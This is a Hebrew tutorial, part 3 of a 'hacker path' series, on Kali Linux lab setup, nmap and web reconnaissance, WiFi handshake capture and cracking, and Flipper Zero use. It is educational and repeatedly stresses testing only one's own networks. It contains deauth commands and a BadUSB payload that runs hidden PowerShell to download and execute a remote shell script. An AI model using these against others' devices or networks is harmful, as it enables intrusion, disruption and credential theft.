מסלול ההאקר: סדרה בת 5 חלקים
חלק 1: מבוא → חלק 2: שליטה ב-Flipper → חלק 3: יסודות Kali → חלק 4: ניצול → חלק 5: הביקורת המלאה
בחלקים 1 ו-2, שכפלתם כרטיסים, ניתחתם תדרי רדיו והבנתם למה רוב ה"אבטחה" היא תיאטרון. ראיתם פגיעויות מבחוץ. עכשיו אתם נכנסים פנימה ורואים אותן מנקודת המבט של התוקף.
Kali Linux היא הפצת בדיקות החדירה הסטנדרטית בתעשייה. היא מגיעה עם יותר מ-600 כלי אבטחה מותקנים מראש. זה יכול להרגיש מכריע. רוב המדריכים זורקים אתכם למים העמוקים עם פקודות שאתם לא מבינים ובלי הקשר למה הן חשובות.
אנחנו עושים את זה אחרת. עד סוף המאמר הזה, יהיה לכם מעבדה עובדת, תבינו סיור רשת ברמה בסיסית, ותלכדו את לחיצת היד ה-WiFi הראשונה שלכם. כל שלב בנוי על הקודם.
חלק 1: בניית המעבדה שלכם
בודקי חדירה מקצועיים לא מריצים Kali על המחשב הראשי שלהם. הם משתמשים בסביבות מבודדות שאפשר לאפס, לצלם snapshots ולהרוס בלי להשפיע על המערכת הראשית. תעשו אותו דבר.
אפשרות א: מכונה וירטואלית (מומלץ ללמידה)
מכונה וירטואלית נותנת לכם את סביבת הלמידה הבטוחה ביותר. אתם יכולים לצלם snapshots של ההתקדמות, לעשות טעויות ולחזור אחורה מיד.
מה תצטרכו
- מחשב מארח: 16GB+ RAM, 50GB+ מקום פנוי בדיסק, מעבד מודרני עם תמיכה ב-virtualization
- תוכנת וירטואליזציה: VirtualBox (חינם) או VMware Workstation Player (חינם לשימוש אישי)
- Kali Linux: VM רשמי מוכן מראש מ-kali.org
פרויקט: הגדרת Kali VM
זמן: 30-45 דקות
שלבים:
- הורידו את תמונת ה-Kali VM עבור ה-hypervisor שלכם (VirtualBox או VMware)
- חלצו את הארכיון שהורדתם (7-Zip מומלץ ל-Windows)
- ייבאו את ה-VM ל-hypervisor שלכם
- הגדירו משאבים: מינימום 4GB RAM (מומלץ 8GB), 2+ ליבות מעבד
- הפעילו את מתאם הרשת במצב "Bridged" לגישה מלאה לרשת
- אתחלו את ה-VM והתחברו עם פרטי ברירת המחדל:
kali/kali - פתחו טרמינל והריצו:
sudo apt update && sudo apt full-upgrade -y - צרו snapshot בשם "Fresh Install" לשחזור קל
אימות הצלחה: אתם יכולים לפתוח טרמינל, להריץ whoami ולראות kali.
אפשרות ב: חומרה ייעודית (לתרגול רציני)
ברגע שאתם מרגישים נוח עם Kali, חומרה ייעודית מסירה את תקורת ה-VM ומאפשרת גישה מלאה לחומרה, מה שחיוני לבדיקות אלחוטיות.
המלצות חומרה
| אפשרות חסכונית | ThinkPad X230/T430 משומש ($100-150), WiFi של Intel מוחלף ב-Atheros AR9285 |
|---|---|
| אפשרות מודרנית | Framework Laptop עם מודול WiFi תואם Linux |
| חיישן ייעודי | Raspberry Pi 5 4GB עם מתאם Alfa AWUS036ACH חיצוני |
לעת עתה, VM מושלם. חומרה ייעודית הופכת חשובה כשאתם צריכים monitor mode לבדיקות אלחוטיות (מכוסה בהמשך המאמר).
אפשרות ג: Live USB (אפס שמירה)
Live USB מריץ Kali ישירות בלי התקנה. הכל נעלם כשמכבים. שימושי לבדיקות על חומרה שונה, אבל תאבדו את העבודה בכל הפעלה אלא אם תיצרו מחיצה persistent.
1# Create bootable USB on Linux/Mac
2sudo dd if=kali-linux-*.iso of=/dev/sdX bs=4M status=progress
3# Replace sdX with your USB device (check with 'lsblk')
4# On Windows: Use Rufus or balenaEtcherdd משמיד נתונים
הפקודה dd כותבת ישירות לדיסק בלי אישור. בדקו שלוש פעמים את שם ההתקן. כתיבה להתקן הלא נכון תמחק את כל הכונן לחלוטין.
חלק 2: החשיבה של הטרמינל
לפני שנוגעים בכלי אבטחה, צריך שתרגישו בנוח בטרמינל. זה לא אופציונלי. ה-GUI קיים ב-Kali, אבל העבודה האמיתית קורית בשורת הפקודה.
ניווט בסיסי
1# Know where you are
2pwd # Print working directory
3
4# Move around
5cd /home/kali # Go to home directory
6cd .. # Go up one level
7cd - # Go to previous directory
8
9# See what's here
10ls # List files
11ls -la # List all files with details
12ls -lah # Human-readable sizes
13
14# Read files
15cat filename # Display entire file
16less filename # Scrollable view (q to quit)
17head -n 20 filename # First 20 lines
18tail -f filename # Follow file in real-time (logs)הסלמת הרשאות
כלי אבטחה רבים דורשים גישת root. ב-Kali, sudo נותן לכם הרשאות root זמניות.
1sudo command # Run single command as root
2sudo -i # Start root shell (be careful)
3whoami # Check current user
4id # Show user and group IDsRoot באחריות
הרצה כ-root משמעה אפס רשתות ביטחון. שגיאת הקלדה כמו rm -rf / תשמיד הכל. Kali מודרני מונע את הפקודה הספציפית הזו, אבל העיקרון עומד: תבינו מה אתם מריצים לפני שאתם מריצים את זה.
ניהול תהליכים
1ps aux # All running processes
2top # Real-time process viewer
3htop # Better process viewer (install if needed)
4
5# Control processes
6ctrl+c # Stop current process
7ctrl+z # Suspend process
8bg # Resume in background
9fg # Bring to foreground
10
11# Kill processes
12kill PID # Graceful termination
13kill -9 PID # Force kill (last resort)פקודות רשת
1ip a # Show network interfaces
2ip route # Show routing table
3ping -c 4 8.8.8.8 # Test connectivity
4curl ifconfig.me # Your public IP
5
6# DNS lookups
7nslookup google.com
8dig google.comפרויקט: התמצאות בטרמינל
זמן: 15 דקות
משימות:
- מצאו את כתובת ה-IP שלכם ברשת המקומית באמצעות
ip a - זהו את ברירת המחדל של ה-gateway באמצעות
ip route - עשו ping ל-gateway שלכם כדי לאשר קישוריות
- הציגו את כל הקבצים ב-
/etcממוינים לפי זמן שינוי:ls -lt /etc | head - קראו את 50 השורות הראשונות של
/etc/passwd:head -n 50 /etc/passwd
מטרה: אתם צריכים להיות מסוגלים לנווט, לבדוק סטטוס רשת ולקרוא קבצים בלי לחשוב.
חלק 3: סיור רשת עם Nmap
Nmap (Network Mapper) הוא הכלי החשוב ביותר שתלמדו. הוא מגלה hosts, מזהה שירותים, מאתר מערכות הפעלה וממפה טופולוגיית רשת. כל השאר בנוי על הפלט של nmap.
הסריקה הראשונה שלכם
בואו נסרוק את הרשת שלכם. קודם, זהו את טווח הרשת:
1# Find your local IP and subnet
2ip a | grep inet
3# Look for something like: inet 192.168.1.100/24
4# The /24 means your network is 192.168.1.0-2551# Basic discovery scan (your network only)
2sudo nmap -sn 192.168.1.0/24
3
4# What this does:
5# -sn = ping scan (no port scanning, just host discovery)
6# /24 = scan all 256 addresses in this subnetתראו פלט כזה:
1Nmap scan report for 192.168.1.1
2Host is up (0.0025s latency).
3MAC Address: AA:BB:CC:DD:EE:FF (Manufacturer Name)
4
5Nmap scan report for 192.168.1.50
6Host is up (0.0042s latency).
7MAC Address: 11:22:33:44:55:66 (Another Manufacturer)הסריקה הראשונה הזו אומרת לכם: "ההתקנים האלה קיימים ברשת שלי." עכשיו בואו נשאל שאלות עמוקות יותר.
זיהוי שירותים
ברגע שאתם יודעים אילו hosts קיימים, אתם רוצים לדעת אילו שירותים הם מריצים.
1# Scan a single target for open ports and services
2sudo nmap -sV 192.168.1.1
3# -sV = Version detection (probe open ports for service info)פלט נפוץ:
1PORT STATE SERVICE VERSION
222/tcp open ssh OpenSSH 8.4p1
380/tcp open http nginx 1.18.0
4443/tcp open ssl/http nginx 1.18.0זיהוי מערכת הפעלה
1# Detect OS (requires root)
2sudo nmap -O 192.168.1.1
3
4# Combined scan: OS detection + service versions + default scripts
5sudo nmap -A 192.168.1.1הבנת מצבי פורטים
Nmap מדווח על פורטים במספר מצבים:
- open - אפליקציה מקבלת חיבורים באופן פעיל. זה מה שתוקפים מחפשים.
- closed - הפורט נגיש אבל אין אפליקציה שמאזינה. ה-host פעיל אבל שם אין כלום.
- filtered - חומת אש או פילטר חוסם את הבדיקה. אי אפשר לקבוע אם פתוח או סגור.
- unfiltered - הפורט נגיש אבל nmap לא יכול לקבוע אם הוא פתוח או סגור.
סוגי סריקה והתגנבות
1# TCP Connect scan (default, noisy but reliable)
2sudo nmap -sT target
3
4# SYN scan (stealthier, default with root)
5sudo nmap -sS target
6
7# UDP scan (slow but important - many services use UDP)
8sudo nmap -sU target
9
10# Scan all 65535 ports (thorough but slow)
11sudo nmap -p- target
12
13# Scan specific ports
14sudo nmap -p 22,80,443,8080 target
15
16# Top 1000 common ports (default behavior)
17sudo nmap targetNmap Scripting Engine (NSE)
ה-NSE מרחיב את nmap עם סקריפטים מתמחים לזיהוי פגיעויות, מנייה של שירותים ועוד.
1# Run default safe scripts
2sudo nmap -sC target
3
4# Check for vulnerabilities
5sudo nmap --script vuln target
6
7# SMB enumeration (Windows shares)
8sudo nmap --script smb-enum-shares target
9
10# HTTP enumeration
11sudo nmap --script http-enum target
12
13# List available scripts
14ls /usr/share/nmap/scripts/ | head -20פרויקט: מפו את הרשת שלכם
זמן: 30 דקות
דרישות מקדימות: הכירו את טווח הרשת שלכם מ-ip a
- גלו את כל ה-hosts:
sudo nmap -sn YOUR_NETWORK/24 - רשמו את ה-hosts שהתגלו ואת כתובות ה-MAC שלהם
- בחרו את הראוטר שלכם (בדרך כלל .1) והריצו:
sudo nmap -sV -sC YOUR_ROUTER - זהו את כל הפורטים הפתוחים והשירותים בראוטר שלכם
- הריצו
sudo nmap -A YOUR_COMPUTERכדי לראות מה המחשב שלכם חושף
תיעוד: צרו קובץ טקסט שמפרט כל התקן, כתובת IP שלו, MAC והשירותים. זהו מפת הרשת שלכם.
סרקו רק רשתות שבבעלותכם
סריקת רשתות ללא הרשאה היא לא חוקית ברוב תחומי השיפוט. אפילו סריקת nmap פשוטה יכולה להיחשב כגישה לא מורשית. הישארו ברשת שלכם, בציוד שלכם וברשתות שבהן יש לכם אישור כתוב מפורש.
חלק 4: סיור אינטרנט
סריקת ה-nmap שלכם כנראה מצאה שירותי HTTP (פורטים 80, 443, 8080). בואו נבין מה רץ שם.
Whatweb: זיהוי שירות מהיר
# Identify web technologies
whatweb http://192.168.1.1דוגמת פלט:
1http://192.168.1.1 [200 OK] Country[RESERVED][ZZ],
2HTTPServer[nginx/1.18.0], IP[192.168.1.1],
3Title[Router Admin], nginx[1.18.0]Nikto: סורק פגיעויות אינטרנט
1# Scan for common web vulnerabilities
2nikto -h http://192.168.1.1
3
4# This checks for:
5# - Outdated server software
6# - Dangerous files/CGIs
7# - Misconfigurations
8# - Default credentialsמנייה של תיקיות: מה מוסתר?
שרתי אינטרנט לעתים קרובות מכילים תיקיות שלא מקושרות מהעמוד הראשי: פאנלי ניהול, קבצי הגדרות, קבצי גיבוי.
# Gobuster: directory brute-forcing
gobuster dir -u http://192.168.1.1 -w /usr/share/wordlists/dirb/common.txtממצאים נפוצים:
1/admin (Status: 301)
2/backup (Status: 403)
3/config (Status: 200)
4/login (Status: 200)מיקום Wordlists
Kali כולל wordlists מקיפות ב-/usr/share/wordlists/. התיקיות הנפוצות ביותר: dirb/, dirbuster/, rockyou.txt (סיסמאות), ו-seclists/ (אוסף מקיף).
פרויקט: בדקו את ממשק האינטרנט של הראוטר
זמן: 20 דקות
- הריצו
whatweb http://YOUR_ROUTER_IPכדי לזהות את השרת - הריצו
nikto -h http://YOUR_ROUTER_IPכדי לבדוק פגיעויות - הריצו
gobuster dir -u http://YOUR_ROUTER_IP -w /usr/share/wordlists/dirb/small.txt - בקרו בתיקיות שהתגלו בדפדפן
- רשמו פאנלי ניהול, מספרי גרסאות או ממצאים מעניינים
ממצא נפוץ: עמודי ניהול ראוטר חשופים עם credentials ברירת מחדל.
חלק 5: סיור אלחוטי
כאן הדברים נהיים מעניינים. רשתות WiFi משדרות כל הזמן, ועם הכלים הנכונים, אתם יכולים ללכוד לחיצות יד אימות: ההחלפה המוצפנת שקורית כשהתקן מתחבר.
דרישות חומרה
ה-WiFi המובנה שלכם כנראה לא יעבוד לזה. אתם צריכים מתאם שתומך ב-monitor mode וב-packet injection. מומלץ: Alfa AWUS036ACH ($50) או Alfa AWUS036ACM ($45). אלה עובדים מהקופסה עם Kali.
הבנת Monitor Mode
מצב WiFi רגיל ("managed mode") מקבל רק חבילות שמיועדות להתקן שלכם. Monitor mode לוכד את כל החבילות בטווח, התעבורה של כל התקן בערוץ.
1# Check your wireless interfaces
2iwconfig
3# Look for your adapter (often wlan0 or wlan1)
4
5# Kill interfering processes
6sudo airmon-ng check kill
7
8# Enable monitor mode
9sudo airmon-ng start wlan0
10# Your interface is now wlan0monסריקה לרשתות
1# Start capturing wireless traffic
2sudo airodump-ng wlan0mon
3
4# You'll see:
5# BSSID = Router MAC address
6# PWR = Signal strength (higher = closer)
7# CH = Channel
8# ENC = Encryption (WPA2, WPA3, OPN)
9# ESSID = Network name
10
11# Press Ctrl+C to stopמה שאתם רואים הוא כל רשת WiFi בטווח, הגדרות האבטחה שלהן, ולעתים קרובות ההתקנים המחוברים אליהן. זה מה ש-war driver רואה כשהוא סורק שכונות.
לכידת Handshake
כשהתקן מתחבר לרשת WPA2, יש four-way handshake. אם תלכדו את ה-handshake הזה, תוכלו לנסות לפצח את הסיסמה offline.
1# Focus on your target network (your own network!)
2sudo airodump-ng -c CHANNEL --bssid ROUTER_MAC -w capture wlan0mon
3# -c CHANNEL = Target's channel from previous scan
4# --bssid = Target router's MAC address
5# -w capture = Save to files starting with "capture"
6
7# Now wait for a device to connect...
8
9# Or force a reconnection (on YOUR network only):
10# In a new terminal:
11sudo aireplay-ng --deauth 5 -a ROUTER_MAC wlan0mon
12# This sends 5 deauth packets, disconnecting clients
13# They automatically reconnect, generating a handshakeכשתלכדו handshake, airodump-ng מציג [ WPA handshake: XX:XX:XX:XX:XX:XX ] בפינה הימנית העליונה.
התקפות Deauth הן לא חוקיות
שליחת חבילות deauthentication לרשתות שאינן בבעלותכם היא עבירה פדרלית על פי ה-Computer Fraud and Abuse Act (בארה"ב) וחוקים דומים במקומות אחרים. בדקו רק ברשת שלכם. המטרה היא להבין את הפגיעות, לא לתקוף אחרים.
פיצוח ה-Handshake
עם handshake שנלכד, אתם יכולים לנסות לפצח את הסיסמה offline באמצעות wordlist:
1# Crack using a wordlist
2aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap
3
4# If the password is in the wordlist, you'll see:
5# KEY FOUND! [ password123 ]
6
7# For stronger passwords, use hashcat (GPU-accelerated)
8# First, convert capture format:
9cap2hccapx capture-01.cap capture.hccapx
10
11# Then crack with hashcat:
12hashcat -m 22000 capture.hccapx /usr/share/wordlists/rockyou.txtבדיקת מציאות חוזק סיסמאות
rockyou.txt מכיל 14+ מיליון סיסמאות מפריצות נתונים אמיתיות. אם סיסמת ה-WiFi שלכם היא "password123" או "summer2024" או שם הכלב שלכם, אפשר לפצח אותה בשניות. סיסמה אקראית של 12+ תווים תיקח מיליוני שנים ל-brute-force.
פרויקט: בדקו את אבטחת ה-WiFi שלכם
זמן: 45 דקות
דרישות מקדימות: מתאם WiFi חיצוני עם תמיכה ב-monitor mode
- הפעילו monitor mode:
sudo airmon-ng start wlan0 - סרקו רשתות:
sudo airodump-ng wlan0mon - רשמו את הערוץ וה-BSSID של הרשת שלכם
- לכדו בערוץ שלכם:
sudo airodump-ng -c CHANNEL --bssid YOUR_BSSID -w mywifi wlan0mon - חברו מחדש התקן ל-WiFi שלכם (או השתמשו ב-deauth ברשת שלכם בלבד)
- אשרו לכידת handshake
- בדקו מול rockyou.txt:
aircrack-ng -w /usr/share/wordlists/rockyou.txt mywifi-01.cap
תוצאה: אם הסיסמה שלכם נמצאה, שנו אותה מיד למשהו אקראי וארוך (20+ תווים).
חלק 6: חיבור ה-Flipper Zero שלכם
זוכרים את כל הלכידות מחלק 2? בואו נשלב אותן בזרימת העבודה שלכם עם Kali.
העברת קבצים
1# Connect Flipper via USB
2# It appears as a mass storage device
3
4# Mount if not auto-mounted
5sudo mount /dev/sda1 /mnt/flipper
6
7# Your captures are in:
8/mnt/flipper/subghz/ # Sub-GHz captures
9/mnt/flipper/nfc/ # NFC dumps
10/mnt/flipper/infrared/ # IR captures
11/mnt/flipper/lfrfid/ # 125kHz RFID
12/mnt/flipper/badusb/ # BadUSB scriptsניתוח NFC Dumps
1# Install libnfc tools
2sudo apt install libnfc-bin mfoc mfcuk
3
4# Flipper saves NFC as .nfc text format
5# Convert to binary for analysis:
6python3 flipper_nfc_to_mfd.py card.nfc card.mfd
7
8# Analyze MIFARE Classic dump
9hexdump -C card.mfd | lessניתוח Sub-GHz
1# Flipper's .sub files are text-based
2cat garage_door.sub
3
4# Contains:
5# - Frequency (315MHz, 433MHz, etc.)
6# - Protocol or RAW data
7# - Timing information
8
9# For deeper RF analysis, use:
10# - Universal Radio Hacker (URH)
11# - GNU Radio
12# - rtl_433 (with SDR hardware)פיתוח BadUSB
צרו payloads של BadUSB ב-Kali, בדקו אותם ב-Flipper:
1# Flipper uses DuckyScript-compatible syntax
2# Create payload on Kali:
3cat > kali_connect.txt << 'EOF'
4DELAY 1000
5GUI r
6DELAY 500
7STRING powershell -nop -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('http://YOUR_KALI_IP:8000/shell.ps1')"
8ENTER
9EOF
10
11# Host the payload from Kali:
12python3 -m http.server 8000
13
14# Copy to Flipper's badusb folder
15cp kali_connect.txt /mnt/flipper/badusb/Payloads של BadUSB הם עוצמתיים
הסקריפטים האלה מתבצעים אוטומטית כשמחברים אותם. payload זדוני יכול להתקין backdoors, לגנוב credentials או להשמיד נתונים בשניות. השתמשו רק במכונות שלכם לבדיקות. לעולם אל תשאירו את ה-Flipper שלכם במקום שמישהו אחר עלול לחבר אותו.
חלק 7: תיעוד וזרימת עבודה
בודקי חדירה מקצועיים לא רק מריצים כלים. הם מתעדים הכל. תיעוד טוב מפריד בין חובבנים למקצוענים.
רישום הערות עם CherryTree
1# Install CherryTree (hierarchical note-taking)
2sudo apt install cherrytree
3
4# Organize notes by:
5# - Target/network
6# - Reconnaissance
7# - Enumeration
8# - Vulnerabilities
9# - Exploitation attempts
10# - Post-exploitationשמירת פלט Nmap
1# Save in all formats
2sudo nmap -sV -sC -oA scan_results target
3
4# Creates:
5# scan_results.nmap (human-readable)
6# scan_results.xml (parseable)
7# scan_results.gnmap (greppable)רישום הפעלה
1# Log entire terminal session
2script session_$(date +%Y%m%d_%H%M%S).log
3
4# Now every command and output is recorded
5# Type 'exit' to stop loggingמסלול ההאקר
סדרה בת 5 חלקים שלוקחת אתכם מסקרנים למסוגלים.
חלק 1: מבוא חלק 2: שליטה ב-Flipper חלק 3: יסודות Kali ✓ חלק 4: ניצול חלק 5: ביקורת מלאה
רשימת בדיקה לחלק 3
☐ הגדרת מעבדה: Kali VM רץ, מעודכן, snapshot נשמר
☐ טרמינל: נוח עם ניווט, הרשאות, שליטה בתהליכים
☐ Nmap: רשת ממופה, שירותים מזוהים, ראוטר נסרק
☐ סיור אינטרנט: ממשק אינטרנט של ראוטר נותח עם whatweb/nikto
☐ אלחוטי: Monitor mode מופעל, רשתות נסרקו
☐ Handshake: WiFi handshake של עצמכם נלכד ונבדק
☐ Flipper: קבצים הועברו, זרימת עבודה מובנת
☐ תיעוד: הערות מאורגנות, סריקות נשמרו
מה הלאה
בניתם את המעבדה שלכם ולמדתם את שלב הסיור. אתם יכולים לגלות hosts, לזהות שירותים וללכוד handshakes אלחוטיים. אתם מבינים מה תוקפים רואים כשהם מסתכלים על רשת.
בחלק 4, עוברים מסיור לניצול. תלמדו:
- Metasploit Framework, האולר השוויצרי של הניצול
- זרימות עבודה נפוצות לניצול פגיעויות
- טכניקות post-exploitation: מה קורה אחרי הגישה הראשונית
- הסלמת הרשאות: מעבר ממשתמש רגיל למנהל
- Pivoting: שימוש במערכת שנפרצה כדי לתקוף אחרות
הסיור אומר לכם איפה הדלתות. הניצול מלמד אתכם איך לעבור דרכן.
מיפיתם את השטח. עכשיו אתם לומדים לנווט בו. חלק 4 לוקח אתכם מצופה למפעיל.
נתראה בחלק 4.